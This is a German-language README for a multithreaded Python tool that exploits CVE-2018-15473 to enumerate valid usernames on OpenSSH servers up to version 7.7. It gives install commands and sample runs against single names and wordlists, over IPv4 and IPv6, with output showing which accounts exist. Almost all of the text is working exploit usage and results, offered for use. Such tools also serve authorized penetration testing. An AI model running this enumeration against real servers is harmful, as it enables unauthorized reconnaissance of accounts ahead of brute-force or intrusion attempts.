
Multithread-fähig, IPv6-kompatibel, Wortlisten-/Einzelbenutzer-Benutzernamen-Enumeration mittels CVE-2018-15473
OpenSSH bis einschließlich Version 7.7 ist anfällig für eine Schwachstelle zur Benutzeraufzählung, da der Abbruch für einen ungültigen authentifizierenden Benutzer nicht verzögert wird, bis das Paket mit der Anfrage vollständig geparst wurde. Dies betrifft auth2-gss.c, auth2-hostbased.c und auth2-pubkey.c.
Möglicherweise müssen Sie das entsprechende openssl-dev-Paket Ihrer Distribution installieren
# HINWEIS: Wenn Sie auf Kali installieren, können Sie die pip-Installation überspringen; paramiko ist bereits vorhanden.
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - ODER -
pipenv install -r requirements.txt # wenn Sie cool sind
chmod u+x ssh-username-enum.py
Ein einzelner Benutzername
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!
Verwenden Sie eine Wortliste mit 10 Threads (Standard ist 4)
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------
IPv6-Adresse auf Port 2222 und ERHÖHTE AUSFÜHRLICHKEIT!
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------